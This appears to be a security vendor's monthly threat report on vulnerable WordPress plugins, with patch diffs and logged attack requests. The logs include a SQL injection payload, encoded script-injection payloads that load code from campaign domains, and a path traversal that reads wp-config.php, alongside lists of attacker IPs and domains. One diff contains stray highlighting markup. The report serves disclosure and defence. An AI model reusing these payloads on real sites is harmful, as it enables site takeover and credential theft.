Relevant Plugins and Vulnerabilities:

Plugin Vulnerability Patched Version Installs WP Product Review Unauthenticated Stored XSS 3.7.6 40000 Form Maker by 10Web Authenticated SQL Injection --- 100000 Add-on SweetAlert Contact Form 7 Authenticated XSS 1.0.8 20 Paid Memberships Pro Authenticated SQL Injection 2.3.3 90000 Visual Composer Authenticated XSS 27 80000 Team Members Authenticated XSS 5.0.4 40000 Photo Gallery by 10Web Unauthenticated SQL Injection 1.5.55 300000 Login/Signup Popup Authenticated XSS 1.5 10000 Easy Testimonials Authenticated Stored XSS 3.6 30000 WooCommerce Unescaped Metadata 4.1.0 5000000 Page Builder by SiteOrigin CSRF to XSS 2.10.16 1000000 Chopslider Authenticated SQL Injection --- 200 Elementor Pro Authenticated File Upload 2.9.4 100000 LearnPress Privilege Escalation 3.2.6.9 80000 Elementor Authenticated Stored XSS 2.9.8 4000000 Avada Authenticated Stored XSS 6.2.3 500000 Ninja Forms CSRF to Stored XSS 3.4.24.2 1000000 Advanced Order Export For Woo Authenticated XSS 3.1.4 90000 Quick Page/Post redirect Authenticated Settings Update --- 100000 Ultimate Addons for Elementor Registration Bypass 1.24.2 100000 WTI Like Post Authenticated XSS --- 10000 WP-Advanced-Search Authenticated SQL Injection 3.3.7 1000 Gmedia Photo Gallery Authenticated XSS 1.18.5 10000

Highlights for May 2020

Cross site scripting is still the most prevalent vulnerability. Bad actors are taking advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.

Unprotected AJAX action bugs are still on the rise. Attackers aren’t hesitating to automate malicious injections for vulnerable plugins.

Attackers have added three plugins and a series of new malicious IPs to their arsenal in an ongoing massive malware campaign targeting WordPress websites with known vulnerabilities.

Details for these highlights can be found under the components listed below.

WP Product Review

Two weeks ago, we reported an Unauthenticated Stored Cross Site Scripting in WP Product Review caused by a lack of protection in a rest route definition and improper handling of user input.

Only a few days after the disclosure of this vulnerability, attackers began to scan for vulnerable sites:

181.58 . 21.65 - - [ 18 / May / 2020 : 17 : 21 : 10 + 0000 ] " GET //wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1 " 139.198 . 16.241 - - [ 18 / May / 2020 : 17 : 15 : 36 + 0000 ] " GET //wp-content/plugins/wp-product-review/readme.txt HTTP/1.1 " 185.162 . 127.248 - - [ 17 / May / 2020 : 03 : 38 : 15 + 0000 ] " GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1 " 213.159 . 210.170 - - [ 17 / May / 2020 : 01 : 35 : 04 + 0000 ] " GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1 "

Patch (version 3.7.6):

Index : wp - product - review / trunk / includes / gutenberg / class - wppr - gutenberg . php === === === === === === === === === === === === === === === === === === === === === === = -- - a / wp - product - review / trunk / includes / gutenberg / class - wppr - gutenberg . php ++ + b / wp - product - review / trunk / includes / gutenberg / class - wppr - gutenberg . php @@ - 97 , 4 + 97 , 7 @@ ' methods ' = > ' POST ' , ' callback ' = > array ( $this , ' update_review_callback ' ) , + ' permission_callback ' = > function ( ) { + return current_user_can ( ' edit_posts ' ) ; + } , ' args ' = > array ( ' id ' = > array ( -- - Index : wp - product - review / trunk / includes / functions . php === === === === === === === === === === === === === === === === === === === === === === = -- - a / wp - product - review / trunk / includes / functions . php ++ + b / wp - product - review / trunk / includes / functions . php @@ - 229 , 5 + 229 , 5 @@ } ? > - < a title = " <?php echo $review_object->get_name(); ?> " class = " <?php echo $class_a; ?> " href = " <?php echo esc_url( $image_link ); ?> " < ? php echo $lightbox ; ? > rel = " nofollow " target = " _blank " > + < a title = " <?php echo esc_attr( $review_object->get_name() ); ?> " class = " <?php echo $class_a; ?> " href = " <?php echo esc_url( $image_link ); ?> " < ? php echo $lightbox ; ? > rel = " nofollow " target = " _blank " > < img src = " <?php echo esc_attr( $src ); ?> "

Elementor

Earlier this month, the plugin Elementor Pro fixed an arbitrary file upload vulnerability caused by an unprotected Ajax hook. It wasn’t long before attackers started exploiting this vulnerability.

Our team identified these malicious IPs trying to detect plugin installations for both Elementor Pro and Ultimate Addons for Elementor:

69.164 . 207.140 - - [ 08 / May / 2020 : 15 : 59 : 31 + 0000 ] " GET /wp-content/plugins/elementor-pro/assets/js/preview.min.js HTTP/1.1 " 45.79 . 193.100 - - [ 08 / May / 2020 : 16 : 49 : 13 + 0000 ] " GET /wp-content/plugins/ultimate-elementor/assets/css/modules/business-hours.css HTTP/1.1 " 62.210 . 172.66 - - [ 10 / May / 2020 : 02 : 33 : 29 + 0000 ] " GET /wp-content/plugins/ultimate-elementor/assets/min-js/uael-registration.min.js HTTP/1.1 " 62.210 . 84.69 - - [ 13 / May / 2020 : 08 : 13 : 57 + 0000 ] " GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1 " 62.210 . 172.66 - - [ 13 / May / 2020 : 08 : 21 : 05 + 0000 ] " GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1 " [ . . . ]

Photo Gallery by 10Web

An unauthenticated SQL Injection was fixed this month in the plugin Photo Gallery.

Patch (version 1.5.55):

Index : photo - gallery / trunk / frontend / models / model . php === === === === === === === === === === === === === === === === === === === === === === = -- - a / photo - gallery / trunk / frontend / models / model . php ++ + b / photo - gallery / trunk / frontend / models / model . php @@ - 197 , 32 + 197 , 32 @@ public function get_alb_gals_row ( $bwg , $id , $albums_per_page , $sort_by , $order_by , $pagination_type = 0 , $from = ' ' ) { - if ( $albums_per_page < 0 ) { + if ( $albums_per_page < 0 ) { $albums_per_page = 0 ; } global $wpdb ; - $order_by = ' ORDER BY </span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>.</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>(</span><span style='color:#d2cd86; '>!</span>empty<span style='color:#d2cd86; '>(</span>$from<span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>&&</span> $from <span style='color:#d2cd86; '>===</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>widget</span><span style='color:#02d045; '>'</span><span style='color:#d2cd86; '>)</span> <span style='color:#b060b0; '>?</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>id</span><span style='color:#02d045; '>'</span> <span style='color:#b060b0; '>:</span> $sort_by <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>.</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '> ' . $order_by ; - if ( $sort_by == ' random ' || $sort_by == ' RAND() ' ) { - $order_by = ' ORDER BY RAND() ' ; - } - $search_where = ' ' ; - $search_value = trim ( WDWLibrary : : get ( ' bwg_search_ ' . $bwg ) ) ; - if ( ! empty ( $search_value ) ) { - $search_keys = explode ( ' ' , $search_value ) ; + $order_by = ' ORDER BY </span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>.</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>!</span>empty<span style='color:#d2cd86; '>(</span> $from <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>&&</span> $from <span style='color:#d2cd86; '>===</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>widget</span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>)</span> <span style='color:#b060b0; '>?</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>id</span><span style='color:#02d045; '>'</span> <span style='color:#b060b0; '>:</span> $sort_by <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>.</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '> ' . $order_by ; + if ( $sort_by == ' random ' || $sort_by == ' RAND() ' ) { + $order_by = ' ORDER BY RAND() ' ; + } + $search_where = ' ' ; + $search_value = trim ( WDWLibrary : : get ( ' bwg_search_ ' . $bwg ) ) ; + if ( ! empty ( $search_value ) ) { + $search_keys = explode ( ' ' , $search_value ) ; $alt_search = ' ( ' ; $description_search = ' ( ' ;

Payload Used by Attackers:

185.162 . 127.248 -- POST -- / wp - admin / admin - ajax . php -- action = bwg_frontend_data & bwg_search_0 = 1 % 23 + % 25DFGDFG % 22 % 29 % 29 % 2F % 2A % 2A % 2FUNION % 2F % 2A % 2A % 2FALL % 2F % 2A % 2A % 2FSELECT % 2F % 2A % 2A % 2FTABLE_SCHEMA % 2CTABLE_NAME % 2C % 27 % 27 % 2C % 27 % 27 % 2C % 27 % 27 % 2C % 27 % 27 % 2C % 27 % 27 % 2C % 27 % 27 % 2C % 27 % 27 % 2C % 27 % 27 % 2C % 27 % 27 % 2C % 27 % 27 % 2C % 27 % 27 % 2C % 27 % 27 % 2C % 27 % 27 % 2F % 2A % 2A % 2Fas % 2F % 2A % 2A % 2Fdummy_3 % 2F % 2A % 2A % 2Ffrom % 2F % 2A % 2A % 2Finformation_schema . tables % 23FGDFGDFG % 29 % 29 % 23 & gallery_type = album_compact_preview & type_0 = album -- 2020 - 05 - 17

Plugin & Theme Payloads Added to Ongoing Campaign

Malicious Domains & Detected IPs

Our team saw the following new malicious domains injected into an ongoing campaign exploiting known WordPress vulnerabilities this month:

css [ . ] digestcolect [ . ] com cls [ . ] balantfromsun [ . ] com count [ . ] trackstatisticsss [ . ] com

The following IPs have also been associated with this campaign:

79.133.202.70 154.43.128.23 185.162.127.248 51.83.70.152 213.159.210.170 139.162.28.41 139.99.169.192 185.217.0.224 84.238.108.177 62.210.180.8 [...]

Exploit Attempts Seen in the Wild

Our team identified attacks against the following vulnerable plugins and themes.

Bold Page Builder (From Last Year)

139.162 . 28.41 -- POST -- / wp - admin / admin - ajax . php ? action = bt_bb_set_custom_css -- css = % 3C % 2Fstyle % 3E % 3Cscript ++ type % 3Dtext % 2Fjavascript + language % 3Djavascript % 3Eeval % 28String . fromCharCode % 2832 % 2C40 % 2C102 % 2C117 % 2C110 % 2C99 % 2C116 % 2C105 % 2C111 % 2C110 % 2C40 % 2C41 % 2C32 % 2C123 % 2C10 % 2C32 % 2C32 % 2C32 % 2C32 % 2C118 % 2C97 % 2C114 % 2C32 % 2C101 % 2C108 % 2C101 % 2C109 % 2C32 % 2C61 % 2C32 % 2C100 % 2C111 % 2C99 % 2C117 % 2C109 % 2C101 % 2C110 % 2C116 % 2C46 % 2C99 % 2C114 % 2C101 % 2C97 % 2C116 % 2C101 % 2C69 % 2C108 % 2C101 % 2C109 % 2C101 % 2C110 % 2C116 % 2C40 % 2C39 % 2C115 % 2C99 % 2C114 % 2C105 % 2C112 % 2C116 % 2C39 % 2C41 % 2C59 % 2C32 % 2C10 % 2C9 % 2C101 % 2C108 % 2C101 % 2C109 % 2C46 % 2C116 % 2C121 % 2C112 % 2C101 % 2C32 % 2C61 % 2C32 % 2C39 % 2C116 % 2C101 % 2C120 % 2C116 % 2C47 % 2C106 % 2C97 % 2C118 % 2C97 % 2C115 % 2C99 % 2C114 % 2C105 % 2C112 % 2C116 % 2C39 % 2C59 % 2C32 % 2C10 % 2C32 % 2C32 % 2C32 % 2C32 % 2C101 % 2C108 % 2C101 % 2C109 % 2C46 % 2C115 % 2C114 % 2C99 % 2C32 % 2C61 % 2C32 % 2C39 % 2C104 % 2C116 % 2C116 % 2C112 % 2C115 % 2C58 % 2C47 % 2C47 % 2C99 % 2C108 % 2C115 % 2C46 % 2C98 % 2C97 % 2C108 % 2C97 % 2C110 % 2C116 % 2C102 % 2C114 % 2C111 % 2C109 % 2C115 % 2C117 % 2C110 % 2C46 % 2C99 % 2C111 % 2C109 % 2C47 % 2C99 % 2C108 % 2C115 % 2C46 % 2C106 % 2C115 % 2C63 % 2C122 % 2C61 % 2C54 % 2C38 % 2C39 % 2C59 % 2C10 % 2C32 % 2C32 % 2C32 % 2C32 % 2C100 % 2C111 % 2C99 % 2C117 % 2C109 % 2C101 % 2C110 % 2C116 % 2C46 % 2C103 % 2C101 % 2C116 % 2C69 % 2C108 % 2C101 % 2C109 % 2C101 % 2C110 % 2C116 % 2C115 % 2C66 % 2C121 % 2C84 % 2C97 % 2C103 % 2C78 % 2C97 % 2C109 % 2C101 % 2C40 % 2C34 % 2C104 % 2C101 % 2C97 % 2C100 % 2C34 % 2C41 % 2C91 % 2C48 % 2C93 % 2C46 % 2C97 % 2C112 % 2C112 % 2C101 % 2C110 % 2C100 % 2C67 % 2C104 % 2C105 % 2C108 % 2C100 % 2C40 % 2C101 % 2C108 % 2C101 % 2C109 % 2C41 % 2C59 % 2C10 % 2C32 % 2C32 % 2C125 % 2C41 % 2C40 % 2C41 % 2C59 % 29 % 29 % 3B % 3C % 2Fscript % 3E % 3Cstyle % 3E & post_id = 1 -- 2020 - 05 - 12

WP Quick Booking Manager (from 4 years ago)

139.162 . 28.41 - action = gen_save_cssfixfront & css = % 3C % 2Fstyle % 3E % 3Cscript + type % 3D % 27text % 2Fjavascript % 27 + src % 3D % 27https % 3A % 2F % 2Fcss . digestcolect . com % 2Fstm % 3Fv % 3Dl6 . 0.0 % 27 % 3E % 3C % 2Fscript % 3E % 3Cstyle % 3E & cssfix = front [ 12 / May / 2020 : 04 : 52 : 19 + 0000 ] " POST /wp-admin/admin-ajax.php HTTP/1.1 "

Duplicator Download

62.210 . 180.8 - - [ 14 / May / 2020 : 14 : 45 : 54 + 0000 ] " GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1 "

Many other plugins are still under attack and public exploits already exist for all of the components listed above. Please check our previous lab notes for more information about this ongoing WordPress Malware campaign.

To mitigate threat, we strongly encourage you to keep your software up to date to prevent infection and mitigate risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.